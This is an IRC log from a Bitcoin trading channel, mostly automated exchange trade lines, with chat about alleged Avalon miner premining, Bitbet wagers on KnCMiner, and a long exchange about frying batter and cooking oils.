21:46:24 [BTCTC] [S.BBET-PT] 10 @ 0.00158 = 0.0158 BTC [-] Jun 17 21:46:30 [BTCTC] [S.BBET-PT] 156 @ 0.00155 = 0.2418 BTC [-] Jun 17 21:46:40 [BTCTC] [TAT.ASICMINER] 38 @ 0.02939 = 1.1168 BTC [-] Jun 17 21:46:40 [BTCTC] [S.BBET-PT] 50 @ 0.00152 = 0.076 BTC [-] Jun 17 21:46:57 [BTCTC] [S.BBET-PT] 1 @ 0.0015 BTC [-] Jun 17 21:47:06 [BTCTC] [S.BBET-PT] 10 @ 0.0014 = 0.014 BTC [-] Jun 17 21:47:12 [BTCTC] [S.BBET-PT] 10 @ 0.00126 = 0.0126 BTC [-] Jun 17 21:47:14 [BTCTC] [S.BBET-PT] 100 @ 0.00125 = 0.125 BTC [-] Jun 17 21:48:11 [BTCTC] [COGNITIVE] 1 @ 0.368992 BTC [-] Jun 17 21:48:34 [BTCTC] [COGNITIVE] 1 @ 0.368991 BTC [-] Jun 17 21:53:13 [MPEX] [S.MPOE] 8350 @ 0.00067121 = 5.6046 BTC [-] Jun 17 22:04:03 [MPEX] [S.MPOE] 2250 @ 0.00067345 = 1.5153 BTC [+] Jun 17 22:07:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.029 = 0.087 BTC [-] Jun 17 22:08:49 [BTCTC] [TAT.ASICMINER] 34 @ 0.02939 = 0.9993 BTC [+] Jun 17 22:09:18 [HAVELOCK] [ASICM] 1 @ 0.029 BTC [+] Jun 17 22:09:49 [BTCTC] [RSM] 61 @ 0.016 = 0.976 BTC [-] Jun 17 22:09:51 [BTCTC] [RSM] 500 @ 0.01699 = 8.495 BTC [+] Jun 17 22:12:10 [HAVELOCK] [ASICM] 53 @ 0.0292999 = 1.5529 BTC [+] Jun 17 22:12:10 [HAVELOCK] [ASICM] 47 @ 0.0293 = 1.3771 BTC [+] Jun 17 22:13:32 [HAVELOCK] [ASICM] 153 @ 0.0293 = 4.4829 BTC [+] Jun 17 22:13:38 [MPEX] [S.MPOE] 15604 @ 0.00067345 = 10.5085 BTC [+] Jun 17 22:13:41 [MPEX] [S.MPOE] 5496 @ 0.00067509 = 3.7103 BTC [+] Jun 17 22:14:27 [BTCTC] [DMS.PURCHASE] 29 @ 0.054609 = 1.5837 BTC [+] Jun 17 22:14:38 [BTCTC] [COGNITIVE] 1 @ 0.368999 BTC [+] Jun 17 22:17:18 [MPEX] [S.MPOE] 3654 @ 0.00067509 = 2.4668 BTC [+] Jun 17 22:17:53 [BTCTC] [ASICMINER-PT] 1 @ 2.8988 BTC [+] Jun 17 22:18:14 [BTCTC] [DMS.SELLING] 30 @ 0.035 = 1.05 BTC [-] Jun 17 22:30:27 [MPEX] [S.MPOE] 5200 @ 0.00067957 = 3.5338 BTC [+] Jun 17 22:32:41 [BTCTC] [DMS.MINING] 29 @ 0.022 = 0.638 BTC [+] Jun 17 22:36:09 [MPEX] [S.MPOE] 25265 @ 0.00067957 = 17.1693 BTC [+] Jun 17 22:37:30 [BTCTC] [DMS.PURCHASE] 31 @ 0.054609 = 1.6929 BTC [+] Jun 17 22:43:08 [HAVELOCK] [ASICM] 7 @ 0.02866001 = 0.2006 BTC [-] Jun 17 22:44:05 [BTCTC] [B.YABMC] 1 @ 0.01001 BTC [+] Jun 17 22:44:11 [BTCTC] [B.YABMC] 2 @ 0.01 = 0.02 BTC [-] Jun 17 22:44:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00689 BTC [-] Jun 17 22:44:41 [BTCTC] [TAT.VIRTUALMINE] 307 @ 0.006899 = 2.118 BTC [+] Jun 17 22:44:41 [BTCTC] [TAT.VIRTUALMINE] 124 @ 0.0069 = 0.8556 BTC [+] Jun 17 22:46:28 [BTCTC] [ASICMINER-PT] 1 @ 2.8988 BTC [+] Jun 17 22:47:02 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00698 = 0.0349 BTC [+] Jun 17 22:49:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.02938 = 0.1175 BTC [-] Jun 17 22:52:45 [BTCTC] [DMS.SELLING] 10 @ 0.035 = 0.35 BTC [-] Jun 17 22:53:48 [HAVELOCK] [HIM] 5 @ 0.28811 = 1.4406 BTC [-] Jun 17 22:58:35 [MPEX] [S.MPOE] 835 @ 0.00068354 = 0.5708 BTC [+] Jun 17 22:58:37 [MPEX] [S.MPOE] 21296 @ 0.00067917 = 14.4636 BTC [-] Jun 17 22:58:46 [BTCTC] [ASICMINER-PT] 1 @ 2.8987 BTC [-] Jun 17 23:00:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.029389 = 0.0588 BTC [+] Jun 17 23:02:49 [BTCTC] [DMS.PURCHASE] 6 @ 0.054609 = 0.3277 BTC [+] Jun 17 23:07:35 [BTCTC] [DMS.MINING] 2 @ 0.022987 = 0.046 BTC [+] Jun 17 23:09:20 [BTCTC] [PAJKA.BOND] 4 @ 0.076 = 0.304 BTC [-] Jun 17 23:09:22 [BTCTC] [PAJKA.BOND] 1 @ 0.07415 BTC [-] Jun 17 23:09:25 [BTCTC] [PAJKA.BOND] 15 @ 0.07415 = 1.1123 BTC [-] Jun 17 23:09:46 [HAVELOCK] [ASICM] 7 @ 0.02929999 = 0.2051 BTC [+] Jun 17 23:10:51 ;;calc 261.42*.8 Jun 17 23:10:51 209.136 Jun 17 23:11:21 [HAVELOCK] [ASICM] 2 @ 0.02929999 = 0.0586 BTC [+] Jun 17 23:13:10 [BTCTC] [DMS.MINING] 1 @ 0.022987 BTC [+] Jun 17 23:17:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.029389 BTC [+] Jun 17 23:18:56 [BTCTC] [TAT.ASICMINER] 96 @ 0.029389 = 2.8213 BTC [+] Jun 17 23:20:30 [BTCTC] [DMS.SELLING] 2 @ 0.035 = 0.07 BTC [-] Jun 17 23:20:30 [BTCTC] [DMS.SELLING] 29 @ 0.0355 = 1.0295 BTC [+] Jun 17 23:20:31 [BTCTC] [DMS.SELLING] 5 @ 0.035999 = 0.18 BTC [+] Jun 17 23:20:34 [BTCTC] [DMS.SELLING] 100 @ 0.036 = 3.6 BTC [+] Jun 17 23:20:35 [BTCTC] [DMS.SELLING] 100 @ 0.037 = 3.7 BTC [+] Jun 17 23:20:39 [BTCTC] [DMS.SELLING] 50 @ 0.037 = 1.85 BTC [+] Jun 17 23:20:41 [BTCTC] [DMS.SELLING] 350 @ 0.0379 = 13.265 BTC [+] Jun 17 23:20:42 [BTCTC] [DMS.SELLING] 100 @ 0.038 = 3.8 BTC [+] Jun 17 23:20:44 [BTCTC] [DMS.SELLING] 14 @ 0.04242 = 0.5939 BTC [+] Jun 17 23:23:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.029389 BTC [+] Jun 17 23:23:20 [BTCTC] [TAT.ASICMINER] 79 @ 0.02939 = 2.3218 BTC [+] Jun 17 23:25:16 [BTCTC] [BASIC-MINING] 1 @ 0.697999 BTC [+] Jun 17 23:25:16 [BTCTC] [BASIC-MINING] 1 @ 0.698 BTC [+] Jun 17 23:25:18 [BTCTC] [BASIC-MINING] 1 @ 0.6989 BTC [+] Jun 17 23:25:19 [HAVELOCK] [ASICM] 7 @ 0.02900001 = 0.203 BTC [-] Jun 17 23:25:21 [BTCTC] [BASIC-MINING] 28 @ 0.699 = 19.572 BTC [+] Jun 17 23:25:42 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 17 23:27:09 [BTCTC] [DMS.PURCHASE] 400 @ 0.054609 = 21.8436 BTC [+] Jun 17 23:28:39 ;;ticker Jun 17 23:28:39 BTCUSD ticker | Best bid: 101.02220, Best ask: 101.89999, Bid-ask spread: 0.87779, Last trade: 101.90898, 24 hour volume: 12877.42190237, 24 hour low: 98.90000, 24 hour high: 102.40000, 24 hour vwap: 100.84026 Jun 17 23:29:04 [BTCTC] [TAT.ASICMINER] 57 @ 0.02938 = 1.6747 BTC [-] Jun 17 23:31:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.028615 = 0.7154 BTC [-] Jun 17 23:31:37 [BTCTC] [TAT.ASICMINER] 18 @ 0.028613 = 0.515 BTC [-] Jun 17 23:31:43 [BTCTC] [DMS.MINING] 1 @ 0.020601 BTC [-] Jun 17 23:31:44 [BTCTC] [DMS.MINING] 32 @ 0.0206 = 0.6592 BTC [-] Jun 17 23:31:45 [BTCTC] [DMS.MINING] 100 @ 0.0205 = 2.05 BTC [-] Jun 17 23:31:45 [BTCTC] [DMS.MINING] 100 @ 0.020002 = 2.0002 BTC [-] Jun 17 23:31:47 [BTCTC] [DMS.MINING] 200 @ 0.020001 = 4.0002 BTC [-] Jun 17 23:31:49 [BTCTC] [DMS.MINING] 9 @ 0.02 = 0.18 BTC [-] Jun 17 23:32:07 [BTCTC] [ASICMINER-PT] 1 @ 2.8999 BTC [+] Jun 17 23:32:41 [BTCTC] [DMS.PURCHASE] 150 @ 0.054609 = 8.1914 BTC [+] Jun 17 23:36:34 [BTCTC] [PAJKA.BOND] 1 @ 0.074 BTC [-] Jun 17 23:36:36 [BTCTC] [PAJKA.BOND] 1 @ 0.074 BTC [-] Jun 17 23:39:41 [HAVELOCK] [ASICM] 166 @ 0.02900001 = 4.814 BTC [-] Jun 17 23:45:23 [HAVELOCK] [ASICM] 11 @ 0.02900001 = 0.319 BTC [-] Jun 17 23:48:24 [BTCTC] [BASIC-MINING] 1 @ 0.698999 BTC [-] Jun 17 23:48:36 [BTCTC] [TAT.ASICMINER] 35 @ 0.029389 = 1.0286 BTC [+] Jun 17 23:48:47 [BTCTC] [B.YABMC] 1 @ 0.01399 BTC [+] Jun 17 23:48:48 [BTCTC] [B.YABMC] 3 @ 0.014 = 0.042 BTC [+] Jun 17 23:49:22 [BTCTC] [DMS.PURCHASE] 50 @ 0.054609 = 2.7305 BTC [+] Jun 17 23:50:12 [HAVELOCK] [ASICM] 200 @ 0.02900001 = 5.8 BTC [-] Jun 17 23:53:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00695 BTC [-] Jun 17 23:54:00 [MPEX] [S.MPOE] 4600 @ 0.0006744 = 3.1022 BTC [-] Jun 17 23:54:02 [MPEX] [S.MPOE] 10524 @ 0.00067169 = 7.0689 BTC [-] Jun 17 23:54:20 [HAVELOCK] [ASICM] 416 @ 0.02900001 = 12.064 BTC [-] Jun 17 23:55:52 [BTCTC] [TAT.VIRTUALMINE] 112 @ 0.00695 = 0.7784 BTC [-] Jun 17 23:59:33 [BTCTC] [ASICMINER-PT] 5 @ 2.8999 = 14.4995 BTC [+] Jun 18 00:01:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.029389 = 0.2351 BTC [+] Jun 18 00:01:14 [BTCTC] [TAT.ASICMINER] 38 @ 0.029389 = 1.1168 BTC [+] Jun 18 00:03:29 Well, I am not suprised Avalon was premining - but (if true) they fucked up bigtime not flashing the data Jun 18 00:03:54 jborkl_ link ? Jun 18 00:04:10 one sec, I got it Jun 18 00:04:47 https://bitcointalk.org/index.php?topic=236348.0 Jun 18 00:05:35 [MPEX] [S.MPOE] 18729 @ 0.00067726 = 12.6844 BTC [+] Jun 18 00:05:37 [MPEX] [S.MPOE] 5219 @ 0.00067857 = 3.5415 BTC [+] Jun 18 00:06:26 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [+] Jun 18 00:06:27 [BTCTC] [BITVPS] 10 @ 0.000673 = 0.0067 BTC [+] Jun 18 00:06:34 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 18 00:07:09 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.006949 = 0.1737 BTC [-] Jun 18 00:07:12 [BTCTC] [ASICMINER-PT] 1 @ 2.925 BTC [+] Jun 18 00:07:15 [BTCTC] [TAT.VIRTUALMINE] 198 @ 0.00695 = 1.3761 BTC [+] Jun 18 00:07:21 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.006959 = 0.174 BTC [+] Jun 18 00:07:30 them not flashing the data makes me think an individual might have done it, maybe afterh hours or something. he forgot the shipping date and never wiped the data, or was too stupid the whole time. Jun 18 00:07:43 [BTCTC] [ASICMINER-PT] 1 @ 2.926 BTC [+] Jun 18 00:07:52 i woulda tried if I had physical access to 60GH or whatever GH it is. Jun 18 00:08:20 I would sneak in at night, turn it on and go to sleep, wake up an hour before first person in office, turn it off, act like office early bird. Jun 18 00:08:22 That is not the first one that came in all dusty, so this is not something new Jun 18 00:08:24 [BTCTC] [ASICMINER-PT] 2 @ 2.926 = 5.852 BTC [+] Jun 18 00:09:04 [BTCTC] [ASICMINER-PT] 1 @ 2.9268 BTC [+] Jun 18 00:09:17 yeah i recall midnightmagic being all indignant last time this was brought up. Jun 18 00:09:18 .indeed Jun 18 00:09:27 Late January was a looong time ago Jun 18 00:09:33 but yes, it was a scandal last time too. Jun 18 00:09:37 [BTCTC] [ASICMINER-PT] 3 @ 2.938 = 8.814 BTC [+] Jun 18 00:09:45 yeah, one was clean, one dusty. another tip that it was an individual. if it was an avalon plot, they would use them ALL a bunch, but the same amount, and still call it 'testing'... which they will likely do anyhow. Jun 18 00:10:03 deadweasel it's notoriously difficult to distinguish insider job from selective scammer Jun 18 00:10:10 Anyway, I don't have one and don't have one ordered Jun 18 00:10:10 try as i might Jun 18 00:10:12 (ie, if it were a plot they could just use some) Jun 18 00:10:19 so, w\e Jun 18 00:10:31 agreed, i'm all theories right now Jun 18 00:11:11 but I would only be surprised if they hadn't used them to hash. that's newsworthy. Jun 18 00:11:12 Common sense told me all I needed to know months ago, just if people want to beleive their gut or not Jun 18 00:11:20 [BTCTC] [ASICMINER-PT] 6 @ 2.9399 = 17.6394 BTC [+] Jun 18 00:11:21 beleive Jun 18 00:11:25 fuck it Jun 18 00:11:34 spelling was never my thing Jun 18 00:12:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.029389 BTC [+] Jun 18 00:12:27 lol Jun 18 00:12:28 [BTCTC] [GSDPT] 10 @ 0.002302 = 0.023 BTC [-] Jun 18 00:12:34 [BTCTC] [GSDPT] 100 @ 0.002302 = 0.2302 BTC [-] Jun 18 00:12:40 BTW, bitbet is the shit. I only bet what my gut is heavy on, and then I forget about it and get a bet + winnings 3-8 weeks later. it's nice. Jun 18 00:13:23 [BTCTC] [DMS.PURCHASE] 17 @ 0.054609 = 0.9284 BTC [+] Jun 18 00:13:38 lol Jun 18 00:13:50 [BTCTC] [GSDPT] 30 @ 0.002301 = 0.069 BTC [-] Jun 18 00:13:50 that is pretty much exactly how it's supposed to work for the general public. Jun 18 00:14:34 what I love, but I don't always see, is the blockchain link thingy that says: BITBET-winnings or whatever.. sometimes I don't see it tho.. Jun 18 00:16:31 like when ?! Jun 18 00:16:38 [HAVELOCK] [ASICM] 1 @ 0.02969999 BTC [+] Jun 18 00:16:53 turns out my boss knows what a bitcoin is, but he thinks it's darknet currency used to buy CP. I did not correct him yet. Jun 18 00:17:18 [BTCTC] [BITVPS] 1 @ 0.000673 BTC [+] Jun 18 00:18:22 [BTCTC] [TAT.ASICMINER] 48 @ 0.029389 = 1.4107 BTC [+] Jun 18 00:19:48 [BTCTC] [ASICMINER-PT] 2 @ 2.8703 = 5.7406 BTC [-] Jun 18 00:20:48 [BTCTC] [ASICMINER-PT] 1 @ 2.8703 BTC [-] Jun 18 00:20:50 [BTCTC] [ASICMINER-PT] 2 @ 2.938 = 5.876 BTC [+] Jun 18 00:21:43 [BTCTC] [ASICMINER-PT] 1 @ 2.8703 BTC [-] Jun 18 00:22:48 mp, the last winning i had, I think 6/14 maybe. I'll look up the TX and send it over. Jun 18 00:23:42 [BTCTC] [TAT.ASICMINER] 36 @ 0.0292 = 1.0512 BTC [-] Jun 18 00:26:04 no what i mean is Jun 18 00:26:10 what blockchain link thingy ? Jun 18 00:27:06 You know how you can put a note on each txn? Jun 18 00:27:45 only the txes made automagically by the system have blockchain.info note attached to them, such as proposition refunds Jun 18 00:28:24 prostituion refunds? Jun 18 00:28:50 damn keyboard, makes me look like a asshole Jun 18 00:29:17 [BTCTC] [PAJKA.BOND] 10 @ 0.071108 = 0.7111 BTC [-] Jun 18 00:29:20 [BTCTC] [PAJKA.BOND] 9 @ 0.071107 = 0.64 BTC [-] Jun 18 00:29:52 ol Jun 18 00:30:01 you misspelled prostituition ? Jun 18 00:30:20 [BTCTC] [TAT.ASICMINER] 85 @ 0.0292 = 2.482 BTC [-] Jun 18 00:30:29 yes, I think my keyboard batteries are dying Jun 18 00:33:41 no hsit? Jun 18 00:33:43 shit*? Jun 18 00:33:55 in spreading the fud or was it engaged it btc cp? Jun 18 00:34:55 LOL, chaang Jun 18 00:35:42 1MatthewNWrightisaScammer124DNsfX , very funny Jun 18 00:44:33 [HAVELOCK] [ASICM] 8 @ 0.029599 = 0.2368 BTC [-] Jun 18 00:46:01 https://bitcointalk.org/index.php?topic=234398.20 Jun 18 00:46:13 seems teh girl has started a weird forum dragon drawing circle Jun 18 00:48:27 Chaang-Noi: what the fuck are you smoking? Jun 18 00:48:39 and where to get it Jun 18 00:48:40 [MPEX] [S.MPOE] 652 @ 0.0006788 = 0.4426 BTC [+] Jun 18 00:49:44 [HAVELOCK] [ASICM] 10 @ 0.0295 = 0.295 BTC [-] Jun 18 00:49:45 [HAVELOCK] [ASICM] 1 @ 0.02900101 BTC [-] Jun 18 00:49:46 [HAVELOCK] [ASICM] 53 @ 0.029001 = 1.5371 BTC [-] Jun 18 00:49:47 [HAVELOCK] [ASICM] 36 @ 0.02900001 = 1.044 BTC [-] Jun 18 00:59:51 [MPEX] [S.MPOE] 822 @ 0.00067169 = 0.5521 BTC [-] Jun 18 00:59:53 [MPEX] [S.MPOE] 7200 @ 0.00067121 = 4.8327 BTC [-] Jun 18 01:01:10 [HAVELOCK] [ASICM] 3 @ 0.029499 = 0.0885 BTC [+] Jun 18 01:01:46 [BTCTC] [TAT.ASICMINER] 26 @ 0.0292 = 0.7592 BTC [-] Jun 18 01:05:01 [BTCTC] [GSDPT] 1 @ 0.002302 BTC [+] Jun 18 01:10:32 mircea_popescu: can you pls look on the kncminer bet? Jun 18 01:10:38 [HAVELOCK] [ASICM] 7 @ 0.0292 = 0.2044 BTC [-] Jun 18 01:10:55 jurov looking. what about it ? Jun 18 01:11:19 i'm curious what deadweasel's martial-arts-trained gut will say about it Jun 18 01:11:29 lol Jun 18 01:11:29 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Jun 18 01:11:36 yet another challenger appears. Jun 18 01:11:56 thx! Jun 18 01:12:33 the one with the addy? yes. and seems donations started arriving already Jun 18 01:13:26 [MPEX] [S.MPOE] 4228 @ 0.00067079 = 2.8361 BTC [-] Jun 18 01:14:59 jurov you the zeroconf there ? Jun 18 01:15:34 knc looked ok at first glance, I was considering ordering but got sidetracked Jun 18 01:15:39 no. i just got 0.5 btc for generating the addy and there my job ended. Jun 18 01:16:01 what addy ?! Jun 18 01:16:15 mircea_popescu: may I have a word with you if you aren't busy? Jun 18 01:16:21 surely. Jun 18 01:16:25 are there any hashing 3rd party BFL chips yet? Jun 18 01:16:57 dub not afaik. Jun 18 01:17:03 mircea_popescu: 1MatthewNWrightisaScammer124DNsfX Jun 18 01:17:07 there were/are people hashing on avalon chips Jun 18 01:17:19 jurov wait, you actually hashed that one for .5 btc ?! Jun 18 01:17:30 hehehehe no it's fake Jun 18 01:17:33 lolk Jun 18 01:17:47 cause it looks like... omfg ten thousand blocks or some shit Jun 18 01:20:10 [BTCTC] [ASICMINER-PT] 1 @ 2.891001 BTC [+] Jun 18 01:20:55 [BTCTC] [ASICMINER-PT] 1 @ 2.891 BTC [-] Jun 18 01:21:47 [BTCTC] [TAT.ASICMINER] 14 @ 0.02917 = 0.4084 BTC [-] Jun 18 01:23:06 jurov, my gut says I have no idea. I have ignored kncminer because when 1 out of 7 is legit, I can't justify spending time following it. Jun 18 01:23:37 what do you think? Jun 18 01:23:42 any chance they deliver? Jun 18 01:23:53 well knc ditched their working proptype for a smaller nano right? Jun 18 01:24:01 so plenty room for error Jun 18 01:24:14 i just think about fried chicken when I see their name, so don't ask me. Jun 18 01:28:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.02917 BTC [-] Jun 18 01:29:36 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [+] Jun 18 01:29:55 KFCminer, instead of jalapeno they ship a 65GH Watermelon miner and the 5gh mini Grape Drank Jun 18 01:32:20 it says 175 and 350 gh Jun 18 01:32:54 but all this is inconsequential really, as no single chip is actually 25 gh or w/e, so they just arrange chips on a pmb Jun 18 01:33:15 what matters is the power factor, and they're claiming about .3 gh/w from what i see. Jun 18 01:34:51 [HAVELOCK] [ASICM] 1 @ 0.029484 BTC [+] Jun 18 01:36:13 It was used officially by the US government in 1954, with Operation Wetback, a project which was a mass deportation of illegal Mexican immigrants. Jun 18 01:36:15 who knew. Jun 18 01:40:31 [BTCTC] [GSDPT] 1 @ 0.002789 BTC [+] Jun 18 01:43:26 [MPEX] [S.DICE] 250000 @ 0.002 = 500 BTC [-] Jun 18 01:43:28 http://www.wired.com/wiredscience/2013/06/four-quark-particle/?cid=8919124 Jun 18 01:43:40 ClientBridge and 139 others retweeted you Jun 18 01:43:41 [BTCTC] [MININGCO.ETF] 2 @ 0.8098 = 1.6196 BTC [-] Jun 18 01:43:48 dude, now if only some people actually start drawing. Jun 18 01:43:55 [BTCTC] [ASICMINER-PT] 1 @ 2.891 BTC [-] Jun 18 01:43:58 [BTCTC] [ASICMINER-PT] 3 @ 2.890002 = 8.67 BTC [-] Jun 18 01:44:00 [BTCTC] [ASICMINER-PT] 3 @ 2.89 = 8.67 BTC [-] Jun 18 01:44:18 i just might Jun 18 01:44:58 would be awesome if there was more direction than it's a medievil rpg Jun 18 01:45:17 but i appreciate and understand the loose approach too Jun 18 01:45:35 i cant read that shit Jun 18 01:45:41 so give your own direction Jun 18 01:46:08 "Wittgenstein wandelt wehmütig widriger Winde wegen Wienwärts" Jun 18 01:46:15 anyone read that outloud ? :D Jun 18 01:46:20 [BTCTC] [MININGCO.ETF] 6 @ 0.8099 = 4.8594 BTC [+] Jun 18 01:46:42 no, but i like alliteration Jun 18 01:47:19 me too. Jun 18 01:47:27 my gpg sig has the mother of all a-literations too Jun 18 01:48:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02917 BTC [-] Jun 18 01:50:55 [BTCTC] [GSDPT] 43 @ 0.002302 = 0.099 BTC [-] Jun 18 01:51:19 [BTCTC] [GSDPT] 112 @ 0.002301 = 0.2577 BTC [-] Jun 18 01:53:45 [MPEX] [S.MPOE] 13650 @ 0.00067469 = 9.2095 BTC [+] Jun 18 01:53:48 [MPEX] [S.MPOE] 1850 @ 0.0006763 = 1.2512 BTC [+] Jun 18 01:55:03 vote TAT Jun 18 01:55:29 [BTCTC] [S.DICE-PT] 44 @ 0.002362 = 0.1039 BTC [-] Jun 18 01:55:35 [BTCTC] [ASICMINER-PT] 1 @ 2.864101 BTC [-] Jun 18 01:55:36 [BTCTC] [ASICMINER-PT] 1 @ 2.861 BTC [-] Jun 18 01:55:49 [BTCTC] [ASICMINER-PT] 3 @ 2.86 = 8.58 BTC [-] Jun 18 01:55:53 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [-] Jun 18 01:55:56 [BTCTC] [ASICMINER-PT] 1 @ 2.852004 BTC [-] Jun 18 01:55:58 [BTCTC] [ASICMINER-PT] 1 @ 2.8515 BTC [-] Jun 18 01:56:00 [BTCTC] [ASICMINER-PT] 1 @ 2.851 BTC [-] Jun 18 01:56:05 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Jun 18 01:56:43 i know this is gonna sound rich coming from an American, Jun 18 01:56:59 but any one have any good links on how to fry stuff with different types of batters Jun 18 01:57:06 ahahahaaa Jun 18 01:57:06 lol Jun 18 01:57:07 ideally not requiring egg Jun 18 01:57:07 ThickAsThieves: batter is bad for you Jun 18 01:57:09 go paleo Jun 18 01:57:37 http://oi46.tinypic.com/5myepw.jpg Jun 18 01:57:47 i wanna replicate boneless buffalo wings Jun 18 01:57:59 (vegan style) Jun 18 01:58:58 we had some awesome ones in Asheville Jun 18 01:59:12 soy or some shit Jun 18 01:59:18 seitan i think Jun 18 01:59:34 wheat gluten Jun 18 01:59:46 if you say so Jun 18 01:59:59 i ams what i ams Jun 18 02:00:39 potato dough can be used Jun 18 02:00:51 i'm not even asking about that part anyway Jun 18 02:00:52 deep fried pancakes Jun 18 02:00:56 i'm asking about the prep Jun 18 02:00:59 the outside Jun 18 02:01:00 no as a batter Jun 18 02:01:20 [BTCTC] [ASICMINER-PT] 1 @ 2.9139 BTC [-] Jun 18 02:01:25 can be used, or is a good thing to use for the project? Jun 18 02:01:32 you can make it thinnner so that it wraps the meat well Jun 18 02:01:45 interesting Jun 18 02:01:50 like i never fry anything Jun 18 02:02:04 i should say Jun 18 02:02:09 i never deep-fry anything Jun 18 02:02:13 so i dunno jack about this Jun 18 02:02:32 i did jalapeno poppers once Jun 18 02:02:38 i was 50% successful Jun 18 02:02:51 i burned the oil and my hand Jun 18 02:03:05 but some of them were delicious Jun 18 02:03:06 tempura is easy Jun 18 02:03:15 [HAVELOCK] [ASICM] 2 @ 0.02948 = 0.059 BTC [-] Jun 18 02:03:38 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 18 02:03:52 i want that dense chain-restaurant batter Jun 18 02:03:53 but pretty much any starchy powder and some liquid makes batter Jun 18 02:04:08 like you find at 99 or Applebees or whateverthefuck Jun 18 02:04:21 like General Tso chicken etc Jun 18 02:04:35 none of what you are saying parses !american Jun 18 02:05:11 http://www.99restaurants.com/img/SmallPlates/BuffaloWings.jpg Jun 18 02:05:26 flour (can be rice etc) + beer + salt Jun 18 02:05:31 http://images.media-allrecipes.com/userphotos/250x250/00/50/03/500387.jpg Jun 18 02:05:40 replace beer with water or pretty much anything else Jun 18 02:05:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02917 BTC [-] Jun 18 02:06:16 mix panko crumbs oslt in for that kind of texture Jun 18 02:06:17 realizing that image is literally from a recipe page Jun 18 02:06:52 recipies for batter are bunk Jun 18 02:07:06 make sticky mixture, flavour and fry Jun 18 02:07:18 its not rocket science but will take some experimentation Jun 18 02:07:19 http://blogchef.net/how-to-make-boneless-chicken-wings/ Jun 18 02:07:27 this guys pics are what i'm looking for Jun 18 02:07:42 hopefully egg replacer works here Jun 18 02:07:49 just use oil Jun 18 02:08:07 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.00696 = 0.2575 BTC [+] Jun 18 02:08:09 what is "Oil (for deep frying)" Jun 18 02:08:16 and add a bit of baking soda dissolved in warm water Jun 18 02:08:22 can i use olive oil? Jun 18 02:08:25 yep Jun 18 02:08:27 k Jun 18 02:08:33 canola watevs Jun 18 02:08:50 olive oil can fuck with the flavour Jun 18 02:08:57 which may not be a bad thing Jun 18 02:09:22 stay away from palm oil for of the greenies will kill you Jun 18 02:09:26 s/of/or Jun 18 02:09:35 k Jun 18 02:09:36 use refined + extra virgin olive oil for frying Jun 18 02:09:45 do not take that advice Jun 18 02:09:48 that's all i have i think Jun 18 02:09:54 maybe some walnut oil Jun 18 02:10:01 and i think some chili oil Jun 18 02:10:10 refined can take higher temps without changing Jun 18 02:10:26 [BTCTC] [S.DICE-PT] 8 @ 0.002362 = 0.0189 BTC [-] Jun 18 02:10:33 extra virgin has stronger olive flavour and lower burn temp Jun 18 02:11:06 never heard of 'refined' olive oil Jun 18 02:11:21 hehe Jun 18 02:11:25 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00696 = 0.0139 BTC [+] Jun 18 02:12:21 the olive oil that doen't has the properties to be classified as extra virgin Jun 18 02:12:25 is refined Jun 18 02:12:28 [BTCTC] [TAT.ASICMINER] 31 @ 0.02917 = 0.9043 BTC [-] Jun 18 02:12:30 i have: extra virgin olive oil, grapeseed oil, and this flavored chili oil which is a mix of canola and olive oil (not virgin) Jun 18 02:12:32 not in the civilised world Jun 18 02:12:57 Refined squeezes all the virgin out Jun 18 02:13:09 go with grapeseed probably but you could try tasting them! Jun 18 02:13:23 i will likely mix the grapseseed with the chili Jun 18 02:13:28 since i dont have a lot of either Jun 18 02:13:33 looool Jun 18 02:13:59 this is for deep frying? Jun 18 02:14:03 just use unrefined olive, refined will lose its aroma in the heat anyway Jun 18 02:14:12 er, i mean virgin Jun 18 02:14:16 the fuck is this refined shit Jun 18 02:14:30 wife is telling me no no we cant use those oils Jun 18 02:14:35 we have canola oil in the closet Jun 18 02:14:41 and says we should use that Jun 18 02:14:43 correct? Jun 18 02:14:46 she is not wrong Jun 18 02:14:48 k Jun 18 02:14:55 "Refined olive oil is the olive oil obtained from virgin olive oils by refining methods that do not lead to alterations in the initial glyceridic structure. It has a free acidity, expressed as oleic acid, of not more than 0.3 grams per 100 grams (0.3%) and its other characteristics correspond to those fixed for this category in this standard" Jun 18 02:15:27 but i <3 her Jun 18 02:15:45 i dont care about your cares Jun 18 02:16:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.02917 = 0.2042 BTC [-] Jun 18 02:16:34 [BTCTC] [ASICMINER-PT] 1 @ 2.8511 BTC [-] Jun 18 02:17:38 http://www.whfoods.com/genpage.php?tname=george&dbid=56 Jun 18 02:17:47 "Is it OK to cook with extra-virgin olive oil?" Jun 18 02:17:50 here! :) Jun 18 02:18:23 hehe Jun 18 02:18:51 its OK to cook with engine oil too Jun 18 02:19:04 now i see why i burnt the olive oil last time Jun 18 02:19:15 it burns easily Jun 18 02:19:18 yep Jun 18 02:19:29 that's what you should be careful about Jun 18 02:19:43 ThickAsThieves: be very careful with olive oil Jun 18 02:19:47 dont heat it above 375 Jun 18 02:20:02 